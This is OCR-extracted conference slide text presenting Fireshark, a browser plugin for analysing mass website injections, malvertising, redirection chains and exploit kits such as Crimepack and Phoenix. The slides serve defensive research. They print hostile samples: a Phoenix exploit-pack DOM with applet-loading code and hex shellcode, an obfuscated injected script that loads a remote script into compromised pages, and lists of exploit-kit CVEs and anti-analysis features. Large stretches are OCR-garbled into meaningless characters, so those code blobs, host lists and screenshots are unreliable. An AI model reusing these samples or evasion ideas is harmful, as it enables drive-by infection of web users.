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Let's start at the beginning... 



IRESHARK 



The Fireshark Project 



Author: Stephan Chenette 

Contributions by: Wladimir Palant (AdBlockPlus FF Plugin) 

Organize and analyze 
malicious website data 

Correlate data 

■ Similar mass injection attacks (C/R/E) 

■ attacker patterns (providers/content/kits) 
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The Fireshark Project 



Current Status 



- 1.0 Release - April 2010 (GPL v3 license) 



- 1.1 Release - due in November 2010 (selective beta) 
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Overview of Fireshark Architecture 



Browser Plugin allows automated control of browser 

Passively logs information to log file 

- Connections (contextual reference) 

- Source and DOM content 

- JavaScript function calls 

- Page Links 

- Screen Shot 

Your Job: Use post-processing scripts/database to output 
organized results 
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Understanding the interweb. 



WEBSCAPE 



OUS 



URL Injection attacks are increasing 



225% increase in the number of new 
compromised legitimate websites in the 
last 12 months. 

Source: Websense Security Labs, State of Internet Security, Q3-Q4 2009 Report 

Translation: 

There is a large chance that a website you have visited 

In the recent past served malicious code. 
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Victims of "Malvertisements" (2009) 



The Drudge Report 

Horoscope.com 

Lyrics.com 

slacker.com 

Eweek.com 

The New York Times 

Philadelphia Inquirer 

Expedia, Rhapsody 
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Google's Doubleclick Spreads Malicious Ads Oil Eweek Website 

Google's Doubleclick ad network has once again been caught distributing 
malicious banner displays, this time on the home page of eWeek,. the online 
version of the popular business computing magazine. Unsuspecting end users 
who browse the site were presented with malvertisements with invisible 
iframes that redirect them to attack websites, according to researchers at 
Websense. The redirects use one of two methods to infect users with 
malware, including rogue anti-virus software. 

In one case, a PDF with heavily obscured javascript shunted victims to a 
subdomain at inside.com. In other scenarios, a generic index.php file did the 
bidding. 
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Redirection chains/ Mass Compromises 



Nine-ball mass-injection 



Legitimate Site Redirector 1 Redirector 2 Redirector 3 Exploit Site 








— *0 



Infected Site mw.kz bro.tw imi.tw ninetoraq.in 
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Redirection chains/ Mass Compromises 



Nine-ball mass-injection 

There are a varied but unique set of hosts involved in the redirection chain 
■ Any repeat visitor is diverted to ask.com instead of a malicious landing page 



The structure of the injected deobfuscation algorithm is equivalent throughout 
all the infected sites 



Legitimate Site Redirector 1 Redirector 2 Redirector 3 Exploit Site 




Infected Site mw.kz 



— *Q^0 — *0 



bro.tw 



rmi.tw ninetoraq.in 
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compromised website using an iframe 



another website5. 



another_website4.c 




therwebsiteO.c 



anotherwebsiteB.c 



ther_website9.c 
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compromised website using a redirector 



Website 1 20(?' Website 




Website 2 
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Exploit site goes through redirector 



Website 1 20(?' Website 




Exploit Site Serves Rogue Ant 
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Exploit Site Serves Rogue Anti-Virus 



XP Security Tool 2010 
XP Defender Pro 
Vista Security Tool 2010 
Vista Defender Pro 
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Malicious Site Serves - Exploit Kits 



'E-2O04-1O+3 
fE-2005-2127 
'E-2O05-2265 



. - ByteCode Verifier component flaw in Microsoft VM 
M505-001 - HTML vulnerabilities 

COM Object Instantiation Memory Corruption (Msdss.dll) 
MF5A2O05-5O- Firefox I nsta I IVersion.com pa reTo 

or lES/Microsoft Data Access Components (MDAC) R« 



ty for Firefox & Opera 



ct Cross-Site Scripting (XSS) vulnerability (IE) 
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Microsoft XML Core Services Vulnerability 
AOL SuperBuddy ActiveX Control "LinkSBlconsO" \ 
WinZip FileView ActiveX (IE) 
Apple QuickTime RTSPURI (IE) 

Vector Markup Language Vulnerability (IE) 
Integer overflow in Adobe Flash Player 9 
'•■'?.hcc: Messenger Webcam (IE) 
Yahoo! Widgets YDP (IE) 



PDF Exploit -collab. collectEmaiilnfo 
AOL Radio Am pX Buffer Overflow 
AOL Radio Am pX (AOLMediaPiaybacI 
M5O9-032 DirectX DirectShow (!E) 



2992 PDF Exploit -util.printf 
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PDF Exploit- col!ab.getlcon 

M5O9-043 - IE OWC Spreadsheet ActiveX controi Memory Corruption 

Integer overflow in the AVM2 abcFile parser in Adobe Flash Player 

Telnet for Opera TN3270 

PDF Exploit- doc. media.newPlayer 
PDF Exploit - LibTIFF Integer Overflow 



IE7Ui 
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Malicious Site Serves - Exploit Kits 
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slued MenvDiv Corruption 
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slued: Memory Corruption 
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Crimepack 2.8 released before March 10' 



Exploits include: 

• Adobe Acrobat Reader Exploits 
(including CVE-20 10-0 188) 

• JRE (GSB & SERIALIZE) 

• MDAC (IE) 

• MS09-032 (IE) 

• MS09-002 (IE) 

• CVE-20 10-0806 (IE) 
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Crimepack 2.8 Anti-Analysis 



Features include: 

1 . Undetected by AV Scanners (JavaScript & 
PDF/JAR/JPG files) 

2. Random PDF Obfuscation (Not using static PDF file 
like other packs) 

3. Blacklist checker & AutoChecker 

4. Prevent Wepawet, JSunpack and other JavaScript 
unpackers to decode your page 
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Crimepack 2.8 Changes 



Added CVE-201 0-0806 

Added CVE-201 0-01 88 

Added more ip's to block 

Frame generator 

Redirector for non-vulnerable traffic 

New JS cryptor 

Anti-Kaspersky emulation 



websense 



RECAP OF NEEDS: Track and Organize 



Organize and analyze 
malicious website data 

Correlate data 

■Similar mass injection attacks (C/R/E) 

■ attacker patterns (providers/content/kits) 
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Current Resources 


Websites: 


Tools: 




Wepawet 


Malzilla 




Anubis 


Rhino Debugger 




ZeusTracker 


1 FF JavaScript 




BLADE (*new*) 


Deobfuscator 




Robtex 


1 DS's SpiderMonkey 




Unmask Parasites 


■ Jsunpack 




Malwaredomainlist.com 


1 Caffeine Monkey 




Badwarebusters.org 


NJS 




VirusTotal.com 


Etc. 




Etc. 
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Malzilla V.S. The Phoenix Exploit Kit 
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Download Decoder Mis,: Decode! I'alime xessoi Shellcode analy:ei Log Clipboard Monitoi Note: He iew PSaipi Tools Settings Aboui 
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:LVR;++B-3B*Q;c=:P**+*J*B2:P*24>4.J3J**:2*0*S-,+=0.+_BIl,VSL6BZ0,e,,[G*e6f-B?K >2JJV6=L . 2QBE, : RL, , [K2 . 2QBe7: Z : , CJ6N: : KC : L 
,;KL, [04Z+8KR:VE;+2ZU-.R3PGQV+L,,6B?6N:e*3a0[++C:PB*=6f9B-. ..E+,]I .11 'V IF 11 l ]l , c E26E :E Z] R4- 

/230;e4:W+RRBToLEVJ_>J>G/-.J_>K>OLI ri1_~L" nLt Lr ~ ~7 ■* :E ] ln IJ : CN.Kl;+2 ; [E Ee4: . ;N; .;.;.;. ;7: D-;_; .: D-;_; 
. :D-;_; .; . ; . ; . ; +R; *RS*RL- : L* : D2HR] -; . , JN0L2; . ; . OJ . OK. , J_; 0; . 0J_>I1_2DK. , 3 . ; .0K.0H_52 : ' ,2DJ?2 J->4cRZPR A 2Se+6K>0DHV[ 

31 H 1 in„KP=:ul7;N:lTP: A 27*P;48DH2EE66E27ZP;48.<2L2e8HRh,_HDE.*I)KA/08.]/:B;2L2K.0HRh,_.DK.7:3F3>I;*L; . ; *R71; e/R2 ', 2DJ=-, L4- 
.L2L*; OJ >cQ*>B F+; KOh] 2] 2 71; Gl; Gl; Gl; Gl; Gl; Gl; Gl; Gl; Gl, 3 . ; , 00; /2L2L27 . ; : 5V7KB/ ; *RL2L2 , =5 ' IHDBTIA' iTU=l A K ^ 








Run script | C Replace evalQ with |evla Find Templates | Wide 2 UC52 | 








Debu 9 1 (~ L , TDitLL LI, j Formatcode | |sho W eva su! te | 












Script can't be compiled 
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Download Decoder Misc Decode! I'alime xessoi Shellcode analy:ei Log Clipboard Monitor Notes He ,'iew PScript Tool; Settings About 

NewTa b(1 >| 






r II 11 [ l III 11 U5;*QWS*c*75, .3f<[,E 'I - 1 175 . L2_WPB5< [22-<beZ 
30L4 M FTI III a _* lill_II -E II _ " c III T [ tl [+1 II l -E II ] * [2_VME4DG : S 
+W5>L2, U=='ecF :i3EXi-h> + Ec ;.3b3+eIIiL 11 [ ' IIJ i [Lh?GP- 
'PeKQb->R,D. Z teT + ; YHG I I . 1 hi 4 lj7gB9 + II LM [ gOQcl+HKHES JKB* J . ; =2 J> ; . . ? . : *-2L2KQRL2L, R7 . , . E_4L2L2 . L8E 
[M066BB.5; .; . : D2 *H. B-3B-R: D2L0662 , RL2L2 7 . B [L4; *0/</+RI12L . <? . : L<RJ_0L06B [H06Ja, L2L2B [H0 6BZ [N*>_-0J . D7HAK> : D2 : 2 ; : 6D@3M.J03 Z _ 
, T6B 4N=] ] 8 ? 1B=K . e : 90c, a7>0 . FU, 4L+>+Z90c *T; . B«RJ ' 3 SB " Z2 LO 6L KRL2 L2 HRL- ; , VIE ] - ; . 0L2 J> ; . ; . 5 6M-G . ; . ; a : 1)2 HRJ [ <L Y02 <2 '*' V7KB / *CM 
e2L/P0.U_2L2L-;.;.;+RLSO.;.;.FL2J;6[P>Z>/CP/BBL6?_V*=6+HL,2L9,D[K*.;J + *3P*];+:2ABE,ViKU6ZU-.;LXOJVE;4-2ZU-.S/+7BZPC=»,;Ke>3 
./BH,V5L68.U-CS+B?J,G-6D[K*.;J**3*LVE;++B-3B»Q07HI3 62*L 6*213 62=3,4] K. . / J60J, G* , , 3a0 [0*ca42 2 JL : MUedPO Z3 6 A V+_V; M6DdJM* : K16; ] 2; 
, 6dPF:0>ZRJVSNM.*64Z[.BUSB54. : <64Z [42g3U0 . A 4B»<i54] K2 65 6ZU- . ; LXOJVR; +2 ZU- . RHZ . . JQC : JV+ZV , V6; 04eB , ] K. . 11, V6<L9, /O, 230/BBO+6 
"11 HE I- III [PCF EEL.- _' 11 l r =• 1 11 [++4 i-4-[ 

:LVR;++B-3B*Q;c=:P**+*J*B2:P*24>4._3J":2*0**,-,+=0.+_BH,VSL6BZ0,e,,[B*e6f-B?K»2JJV6=L, . 2QBE, : RL, , [K2 . 2QBe7: Z : , CJ6N: : KC : L 
, ;KL, [04Z+8KR:VR;+2ZU-.R3PGQV+L,,6B?6N:G*3a0[++C:PB*=6f9B-. . . E+, ] K. . H, VE IF' 11 l ]l , c _i-E„-E_Z]R+ 

/230;e4:Er+RRET0LKVJ_>J>G/-.J_>E>0LEO : Ii40S^RSiR7/-HJ_>LH0LELR7/-7:D,:E]2310O+2:CN.Kl;+2;[R3,8e4:<.;H;.;.;.;.;7:D-;_;.:D-;_; 
. :D-;_; .; . ; . ; . ; +R; *RS*RL- : L* : D2HR] -; . , JN0L2; . ; . OJ . OK. , J_; 0; . 0J_>I1_2DK. , 3 . ; .0K.0H_52 : ' , 2DJ72 J->4cRZFP A 23e+6K>0DMV[ 

IH 1 HI KR=2r 17;N IIP : A 27*P; 45I'II2rE66E272P; 45 . 2L2e8MRh, HDI >DI 01 1 B; L2K. 0HRh,_. DK. 7 : 3KN; *L; . ; *R71; e/R2 ', 2DJ=-, L + 
.L2L*; OJ >cQ»>B F + ; KOll] 2] 2 71; Gl; Gl; Gl; Gl; Gl; Gl; Gl; Gl; Gl, 3 . ; , 00; /2L2L27 . ; : 5V7KB/ ; *RL2L2 , =5 ' IHDBYIA' iTU=l A K 








Run script | C Replace evalQ with |evla Find Templates | Wide 2 UCS2 | 








Debu 9 1 ri , TDiLLL LI, j Formatcode | |>howeva su!ts| 








A 




Script can't be compiled ^ 
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JSUNPACKV.S. 


1 

The Phoenix Exploit Kit 










tnter a single L"R_ (or pasce . avaScript co decode): 


JSUNPACK 

A Generic JavaScript Unpacker 
CAUTIOX: jsunpack *vas designed for security researchers and computer professionals 

RECENT SUBMISSIONS 




http: osloebi.com findex.php 






Upload a PDF = pcap = HTML, or JavaScript file | 


[ Browse_ 




Private': 1 D Help: privacy uploads 
Description | 
Submit URL(s) | 
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JSUNPACK V.S. The Phoenix Exploit Kit 



ERROR: CAN NOT FULLY DECODE 



4 



j Xm -■.]■■ sis Completed 



i; : is -. -i . .- • .: ij t ' id- . i ip 
info: ~decodingL?vd=0] found JavaScript 



«:;;::■ 




f index. pap 



scrip ex icnpc- 

.7inf2zid:dib:aisi_:vi]:vaz3.sr>.'nv:T. : <iT:s::xioip:L~£i>.:.-tii3:.-7.->i<ic-: iciD:::7iA:n?:ui=3S3Ti:: 
55Q0g:j:e?j:cc3vea:vc^Aczc\3433:::X3i3c-^^ 

~~~~ 3C.T313[Q30-03M 3 . 3 X3] 13 C3S 133. C2s A:P3c < =20:Q :3- S::i3X":ipvnbq=" 

ibXd^-ZstXPpSv/CisALV Zl P]3HZZ;SAdSRI]P]=dj3 VL?;a]:b?I iS >Q^^>.:af:.6]dDiiC3:i?:;Va-;=c-cK-:fi.f s tZZl>.:S PT-l"a4?l<04:JL * i ~?7cF1177-i97cF=P]; 

:cibe T vi:iit:-.:;-b'G.A-:s?d:;v->.-,=z:.Q-.,:z c,s:bvo:>;h\:NZi-:G:"G4zvz3j3:ih_:-_i;\7N:;G^7N=:i3.E3\'"VGi?^5T50 
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Spidermonkey/ CaffeineMonkey 



JavaScript Engine + Limited browser features 



iclienette@ssdstretl : -/ js$ js 
js> eval 

function eval {) { 
[native code] 
> 

j s > wi ndow . 1 oca t ion . se arch 
typein:2: ReferenceError : window is not defined 
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Emulation -> Implementation is behind 



document.body is undefined 

document.title is undefined 

document.forms is undefined 

document.documentElement is undefined 

document.URL is undefined 

document.getElementsByTagName is not a 
function 
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Emulation -> Implementation is behind 



window.location. search 
window.addEvent is not a function 
window.onDomReady is not a function 
window.parent is undefined 
window.screen is undefined 
window.top is undefined 
screen is not defined 
top is not defined 
parent is not defined 
self is not defined 
location. protocol 
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When an alternative just won't do. . . 



INTRODUCTION 



Why do we need Fireshark? 



Researcher 
Network Administrator 
Penetration Tester 

We need tools to analyze mass injection attacks 
Website Architecture/Redirection Chains 
Source / Changes to DOM / JavaScript function calls 

- Content Profiling / Screen shot 

Using an organized and ultimately VISUAL approach 
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List view V.S. Graph view 
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File Edit Rule: Tool: Vie 1 .--' Help 

Web Sessions | << 




# | Result | Protocol | Host | URL | E 




^631 304 HTTP deki-hayes ; :-top-s.png 

^632 304 HTTP deki-hay >: Tit-body-s.png 

^633 304 HTTP deki-hayes-royk /sk t-bottom-s.png 

^634 304 HTTP deki-hayes-royk /si 

<^635 304 HTTP deki-hay /il-tr.png 

^636 304 HTTP deki-hayes-royk /skins/ace/neutral/il-tl.gif 

^637 304 HTTP deki-hayes-royk /skis itlerbg.png 

2^638 200 HTTP deki-hayes-royk hID=... 1 

^639 304 HTTP deki-hayes-royk /ski itlelbg.png 

^640 304 HTTP 

^641 304 HTTP deki-hayes-royk. /skins/ace/neutral/il-bodyl.gif 

<^642 304 HTTP deki-hayes-royk /skins/ace/i 

<^S43 304 HTTP deki-hayes-royk /skins/ace/neutral/il-br.png 

<^644 304 HTTP deki-hayes-royk. /skins/ace/neutral/il-bl.png 

^645 304 HTTP deki-hayes-royk 

^646 304 HTTP deki-hayes-royk /editor/popups/popup.css 

<^647 304 HTTP deki-hay es-rcyl /editor ipop jps/seleitTopi.:. ess 

^649 304 HTTP deki-hay jing.html 
^650 304 HTTP deki-hayes-royk /skin: jnim-circle.gif 
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List view V.S. Graph view 



mmmawEMMEim 



File Edit Rules Tools View Help 



# | Result | ProtocoT~ 



w 

^632 
^>633 
^>634 
^635 

^-637 

_f 

^-639 

^-640 

<^>641 

^642 

^-643 

^-644 

^645 

^646 

^647 



HTTP 
HTTP 
HTTP 
HTTP 
HTTP 
HTTP 
HTTP 
HTTP 
HTTP 
HTTP 
HTTP 
HTTP 
HTTP 
HTTP 
HTTP 
HTTP 
HTTP 

HTTP 
HTTP 



Host | URL ~ 



<i-hayes-royk (s rnt-bottonn-s.png 

!::■■ :■■:■■ ■'.."■■ 

:i-hay es-roy I : i . php?attachID= . 



ZO 




ther websiteO.c 



another_website5 



anotherwebsitel .com 



another_website8.c 
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Architecture of a youtube.com 



youtube.com 



sO.2mdn.net 



ad-g. doubleclick, net 
i3.ytimg.com 

^200 200/ 

ifijan 

200 **- www.youtube.com ~^~ >200 




i2.ytimg.com 



il.ytimg.com 



csi.gstatic.com 



i4.ytimg.com 



s. ytimg.com ^) 
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horoscope.com (Content responsibility) 
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No, Ingress Connections 



cl lcksoi — con , eastnoney , con * nob lle-de , honesaleplus , ru 




1 1 1 


— I 1 *— 






hhh , google-analy tics , con 




+ 






tobeyeu.con 




+ 






uuu, google, con 




+ 






googleads , g , doubleclick . net 




+ 






93,186,127,49 




+ 






pagead2 , googlesyndication , con 




+ 






hindger.con 




+ 






rascop.con 




+ 






sodanthu.con 




+ 






aponith.con 




+ 






purgand.con 




+ 






RZRzR"gunentha,con 




+ 






mmm , bluehost , con 




+ 






58centptr,con 




+ 






mhh , sedoparking , con 




+ 






onlinesertepkos,con 




+ 






12s83,con 




+ 






ad,HZ,cz 




+ 






eHt.tyroo.con 




+ 
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Original Source code (Phoenix pack) 



*Ji. ;i*0O>L7S-E9CSCi aiaC-e-JXjr. J '0OQIGHB&L-;SC'ai/?S; . :Sb2L75i . : 9K1.TS) . sSBiLlSqS.Itf 7Xl- l_i HX+H.'SC] J._VQ-* 7&BCQ-*V5*T*7SZ- 
-i YS4 KdaOU ad-W!i j [ +W CV£GSB~ UflbR - q-tfSj - , a_y x K6_VSc : WS,- *CMS *c '71 , . 3i< f , ROjnhBJIKV- &ff -i+»8 / P+HSfthOrlj 7 J 7S - L2;_OTBi< ( 22 -<:bB Z 
6 OL-i 7.C (» K ■ D0 3 aJ_V; O0_V '■ V73E/ . Hc_ ■ c7£ ,^B, J JV5FQ : 79»C?*E lC-^: [ +*5<l+V-D?4a9ti Z7(.75F0* E<*ttt»B- , ?S EQBhSE/ . «< J • [2_VBE«3 : 3 
4VE>LS < IT-- - tcFeTJcVHA-Qr+aeaNteSHHEc^J .3to?»[Bff9SYL[d6TI/l_b[BgXHOETeEXi-h?+_E(;_: .ib3-heHTTL-&i*2I8T?3S A 3[CVTr-I&QrfQPft[Lh78P' 
/P*Ka>' >K, L Z A £eT>+TjYiC.-3KQb' >R+tt-] VXQeft/ P] tf9cChli34*ljT(ieSia+tWYUJ[a<Xict*BKIIK3JK**J. : -2tf>; . , ?. : *-2L2K0EL2LxR7. , . B_4L2L2 .L8B 
[HD6Q»<£f ,.j.* iMI *I . B-3B-ftt&SLfl^i2,ftLiL£ , ? J «tL4f -D/</+Ut2L.<?. 3 L*ftJ_0LO*B.J;llfliJ&, L£L2B(BQ«Z[M»>_-QiJ .CJ"?JHK> tWi f: t 0«tf iff J 03 Z 
r T6DlH-] iQ?it*x.*i9Qi; r +7>Q.TV f *£+>+»$t:»T! rlctpj 3tS9'22L041lKL±L2in^-;«Vtt2] -; T 01.Zd>; . : . SSH-C- : ■ ;«i P2JjP4[cLTO2-:S A V7Kg/«cii: 
»£ t/ PC , P_2 LZL- ; . ; . ; +P1«0, : . : . FL£ J; 6- [ P> Z>/CP/BBL &?_V* -fi+ML , 2 L9\, B [K * . S J+* 3 P * J i +i* ABE , V4 EVGZP- , ; LSM VP ; *-2 ZV- , 3/ +7BZPC- * , 1 K? * 3 
./BB,V3Ltfl .U-Ca+BWj C-SB[K'- ; J'*a »LVB:+4&-3B"OQ?l5s2 *L4*2|«2«3, 4 J K. ,/ <!ri<M,G', , 3sO[0'ch«£ JL:Hb4dJQZ&S*V+_Vsll6»dJIL* :KlS;]2; 
„ fidFI : C> Zft JtfSWH .-'-^H. BUSBS4 . : * &4I { 42 g 3 Ua . ' 4U • v 6 4) 1/S. «S «tr- . ; L KOJ VE J +2 Slf- - RHZ - . JQfT : OT+Rf* , W# »04*&j 1 K. * H r V$<Uf, tO, Z30/B.B-&+6 
*1felS; f;HP A 3 r /KV?HK^|pgp/BBL.$7_v/Q,S3e/B Kn.il/-3, / J, <JKVf ;eJ?FV A 3 A *' [4+flB A 6%2| rBTBBSt. ; t64E[«aa9*a^HBJKt>, A 6 A *'[ ft-OH^^Jt 
.EU3B*PB-3 . .;,», »"6+NL, .54. i <6*iSZfJ*3_B3PGC!V*L, , L&GKV4ZlTft[+aZD02.5*B3 1XL4C5-B ' JJbQ. * f J+B*3, DLP, Z. * . J; ST, r3B_BE+BZ^ , CJ6Ni 
:L,VB.i+4B--aB*^-c-:P"+'J'fi2 :P»24>4._5 J«™:2'0", -,4--Q.. 4_iH J 1teLfieZQiC J . , [B*e«-B JKi->£JJVe^l,, .20BE, eBL, x JK2 .ZCBe7:2i j CJSWj r KjC :L 
, ; KL r f D4 7*BKR:Vft;+^?V- .B3PGQU+L,. , 6E ?6K:J| '3 aD (>+C LP^'-fiJSa!- . . .f:+ r j K. . B, Vev.Jpga.Hyn^^S-ceCWL, 2«>] e^3_E+-l-23fl5SS"QiBI26Ii LE2Z] R+ 

•iJCiV'SLy :>e_*7*OTlHl; T; Zfcn;E[H&gEnHSL+j^* i*-:1»J»Tl_5i ?-><HCB»»»JlKl^7*l^lJ«JtOW>-: is , , :DSK>2 6T*3-Ji :<ai>. J_»JI«3ir. J, 4JHi 
/230;e4: «#BRB.aL,KVJ_>J>C/-. <3_>K>OLHOiiB40Sy4RSlR7/-HJ_MJIDLXLR.?/- , 7 j D, i B] £510<H3iCM. Rli+Zf [BB,8e4 .' <. ;HJ . ; . ; , t . ;TiB-i_; . i b-i_, 
. *9-i_t , f ii;.j - ;+B: "B3'BL- rL-TD£«E] - j . H JJJQL2 j , j .OJ.oIL, J_;0; .&J_>N_i&K. , 3 . ; .OK.OH^SJ : " ,2DJ }2J->4cfl.ZPB.*2Be4*l&fl»JW(" 
>HDH2KE*JU1KR-2>0 3 7;H:¥P:-' , 2 7«PJ 4SPJT2KE t6E27i;P; 4B. *3L2#BJ!Rii f _HBK. »fiEJt/oe.] / ; P:2J*2 5I,QnWV_, PK, 7:31(3*: "t! , l«»7i:»/K *,2W--,L+ 

.L2L*j aj^eO-^B^+jKDhlZj*?*; CU_«s Ol;_ti:_ttJ_Cl;_<;i;_Cl;_Oi, J. j jOOi/SLSLa?, i_iSV7MB/i+BL2L2,-S'IK&BTIJl- iTO-i'-i; 
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DOM result (Phoenix pack) 










444 5 53 540OO0" " + edc. substr(obj pos); }el se{ return edc; }}lev('j " , 

v1d>; >f unction FLASH5PRAYQ{var movie = (navigator. appNaine. indexof 

('Microsoft ') ! — 1 ? window : document) [' BridgeMovie' J; movie. sendFramJS 

(fdat a) ; Jf unction GFl_ASHQ{try{var x = navigator. pi ugins ["Shockwave 

Flash"] ; if (x && x. description) {var Playerversion = 

x. description. replace(/C[a-2A-z] |\s)+/, "").rep1ace<;/(\s+r |\s+b[Q-9] 

+3/» "."j.spHtf . ");fvers=Playerversion[2];FLASH5C); }else{PDFO; }} 

catch(e){PDFO; }}function RUNJAVA(veO{try{function inDesAppletCdata) 

{var d=document. createElement(" div 1 );d. setAttribute 

('id' , ' i ' ); document. body. appendchild(d); var applet="< applet 

code=" dev. s.AdgredY. class' archive='files/des.]ar ' width='462" 

height = ' 255 '>< param name='data H VALUE= H "+data+" , ><param . 

name=" cc' value=' 1 ' &gt ; < /applet > "; document. getElementByid A 

('1 '), inner HTMt_=applet; }f unction inApplet (archive, sc){var > 

d-document.createElementC div" ); d. setAttribute 

(' id' , ' i ' ); document. body. appendchild(d); var applet ="< applet 

width="l' height = 'l' code=' Appletx' archived , +archive+" '>< param 

name="sc' value= ' "+sc+" " >< param name='np" 

value=' 90909090 "4gt; "; document . get Element Byld(' i '). innernTMi_=applet ; } 

var 

Shell COde=' 5053 515256575 59CE8000000005D83ED003lCO&4034030730C8B400C8e70 

lCAD8B4008EBC98B4 0348D407C;8B4C3C565 7BE5E01O0000lEEBF4E01000O0lEFE8D6010 

0005 F 5 E39EA81C2 5 E010C0Q 5 2 688C0G000OFF9 54 E01O0C039EA81C2 5 E01O00031F6O1C2 

3a9c3 56302O00080fbO074G6331c3246ebeec60432O089ea31c24 502000O52ff95 52010 

0OO89EA81C2 5002000052 50FF95 5601000O6A0Q6A0O89EA31C2 5EC1Q0005289EA81C278 

02O000526AO0FFO06AO589EA31C2 5E0100OO52FF95 5A01000039EA81C2 5E01000052688 

C C J000FF954E01000O89EA81C2 5E01000O31F601C28A9C3 5&E02000080FB0074 0&881C 

3246EEEEC6O4320089EA81C24 5O2000052FF95 5201O00O89EA81C2 5002000052 50EF95 5 

601C0006AOOGA0039EA81C2 5E010C005239EA81C2A6020000520AOGFFDOOA0589EAS1C2 

5EO1000052FF95 5A01O0009D5O5F5E5A595B58C300OO000000OO000000OO000000OO000 

04 7G574 54 65GD7050617468410O4C6F61644C69627261727941OC476574 50726F634164 

64 726573730057696E4 578656300BB89F289F73QCOAE75FD29F789F931COBE3CQOOOOGO 

3B5le0200OO66AO0335le02000O8e707333C6lC03B5le02000O8DeDlF02O000A00385lB 

02O000ABADO3851B02O00050ABAD03851BO20000AB5E31DBAO5603851BO2000089C689IJ 

751FCF3A6597404 5E4 3EBE95E93O1E003S52 702000O31F69666ADC1E002O3851F02O000 

39C.GADG3351B02G000C3EB1000O000Q000O000Q000000CQ00000000G39S51B02000O505 


<f=> 
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How to use Fireshark 1.0 



Install Fireshark Firefox plugin (.xpi file) 
Create data.txt file, place in your home directory 

ToolS->Go ! (then go and get a cup of coffee) 

** Reportlog.yml ** 

Use post-processing scripts 

Firesharklnitlnfo.pl (must be run first) 

- GraphViz.pl 

- lngressEgress.pl 
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Post-Run Analysis / data correlation 



Log is analyzed manually or automatically via post- 
analysis correlation process 



CT 
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Favorites Tods Help 



History |ooknwks Tools yelp 



■B 



\Q 



/ (~T 



"qra^ 



1 1£| Most Visited _, Smart Bookmarks #■ Getting Started - . Latest Headlines 



> 



e Modified 
>/2Q 10 4:53 PM 
5/2009 12:14 PM 
1/2009 4:42 PM 
52/2009 4: 27 PM 
r /2Q 10 4|47PM 
J/2009 11: OS AM 
2003 1;38PM 
V2010 5:38 PM 
2009 12:28 PM 
2/2009 2:02 PM 
'2005 SlISPM 
2009 11:52 AM 
2005 5:15 PM 
2005 5:15 PM 
'/2010 5: 19 PM 
ViOlOSiSSPM 
V2010 5:33 PM 
'/20l0 5:33 PM 
'/2010 4:46 PM 



*j0Go 
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Use cases... 



N THE RABBIT HOLE 



Down the Rabbit hole 



Analysis of Three exemplary Injection campaigns 

Injection campaigns occur daily 

A breadth view analysis 

Gain a better understanding of the malicious webscape 

Use Fireshark to do it. 



websense 



Down the Rabbit hole 



•Injection Example #1 
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Injection Example #1 



1 3k matches/24hrs 



</center> 
</bodtfX/htia> 



<script>/*E3HJ GPW try {window, onload - function ()(var Xfjgsl"uq8wh7d - 
document ,createSlea;ent ( 's(c'r> SiSp*) (tSM* 1 . replace </S|l|\) |S*|\(|\! |\$|#/ig, 
' ' ) I ;Xf 3 gsl7yqawh7d.3etAt tribute ( ' type' , 

' text/javascript ' ) :Xf j gs 17uq8wh?d . setAt t ribut e ( arc ! , 'h2 1) £t A \ fifp) !fl?#G'/ A ) 
/5S Aft gfi (#o##S$$c ! *g#£ ! l£$*e$) -** ! #cC*e fiog-$k#r# A [ . 
($@y$o#em4#) $i@u$£r@i&. «c $ofi*> . W (SSj (}#$ (p#> 

(.grl !le!nfirreHeS A Sn#rf-(c(»o{a)K$S^^iein!U#eS?Hrfe(s!5aS? x lft A Se-So x Sn#Ca) ! 
(0«$£$/#$ailSt#t*#e64$rf (fv(&9i {$ (|t (&$a{ ( > )o! trC-eigt) $/#& (a& A l A ! teee! 
(*r#(tv)iS#sf#ftseaS^#)o(S A r#g5 A 5/£!g!U#$m)je!fta(!cjrss;:.ii::-c3 = i#i:-iL A (/teSi?xiHl 
(Si# (i$Si ■ Sc*5ofi) 5 (a! #/ (#g! (£o£) o£$g> £!l$e ( ■ $ !<=) o) £$fc#) S/># ' . replace (/£| \*| 
\$|\(|£t\) ItlWig. "J) rtrjgsl'uqSvrttfd^setAttributef 1 defer' , 
defer') ;Xf jgslVuqewhTd.setAttirilHiter'id' , ■vtjr) (>d(#p'J !S#n)o446! Tv'vt 
($#>3$t£?IHC'teiTn#«#gtk€e«' .replace (/\ rt | \) UIC |\(|# I \P |\$/ig, 
' ' ) } : do ctmten t . body . appendCbi Id (Xf 3 gsl7uq8tf h7d } ; } } ea t cb £e ) U </ sc r ip t> 
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Injection Example #1 



Step 1) Analyze a subset (500/1 3k) 

Breadth 

- Popular campaign will emerge 

• Injections into unique websites will lead to same hosts 

Depth 

- Details of the attack 

• Screen Shots 

• Source code, Deobfuscted DOM, Network traffic 
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Bird's Eye View of 500/ 13k 
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^1 

Popularity of Requests 




No. Ingress Connections 








clicksoi — con.eastnoney.con.nobile-de.honesaleplus.ru 
huh . google-analytics . con 


+ 








tobeyeu.con 


+ 








uuu. google. con 


+ 








googleads.g. doubleclick. net 


+ 








93.186.127.-49 


+ 








pagead2.googlesyndication.con 


+ 








hindger.con 


+ 








rascop.con 


+ 








sodanthu.con 


+ 








aponith.con 


+ 








purgand.con 


+ 








flZfizfi'gunentha .con 


+ 








HUM.bluehost.con 


+ 








5Gcentptr.con 


- + 








UMU.sedoparking.con 


+ 








onlinesertepkos.con 


- + 








12s83.con 


+ 








ad.HZ.cz 


+ 








ext.tyroo.con 


+ 
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MONTMt 


NFOHHATIGN PROTECTION 









Popularity of Requests 



No. Ingress Connections 



clicl<30r""COH + C-33'tHOnG*J + COH + Mohilfl™€ 


*- 


m hanasaleplus * ru \ 


s 






















tobeyeu.con 


- 


^B 








uuu. google. con 




^H 








googleads.g. doubleclick. net 




* 








93.186.127.49 




+ 








pagead2.googlesyndication.con 




+ 








hindger.con 




+ 








rascop.con 




+ 








sodanthu.con 




+ 








aponith.con 




+ 








purgand.con 




+ 








flZfizH gunentha .con 




+ 








HUM.bluehost.con 




+ 








5Gcentptr.con 




+ 








UMU.sedoparking.con 




+ 








onlinesertepkos.con 




+ 








12s83.con 




+ 








ad.HZ.cz 




+ 








ext.tyroo.con 




+ 
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Popularity of Requests 





Ho. Ingress 


Connections . 


CD 


£ 5 


'£ 3 




clicksoi — con.eastnoney.con.nobile-de.honesaleplus.ru 




A + 


1 ' 




f 93«lfie,l£7,4S]c°» 










googleads.g. doubleclick. net 


93.186.127.-49 




+ 






pagead2.googlesyndication.con 




+ 






hindger.con 




+ 






rascop.con 




+ 






sodanthu.con 




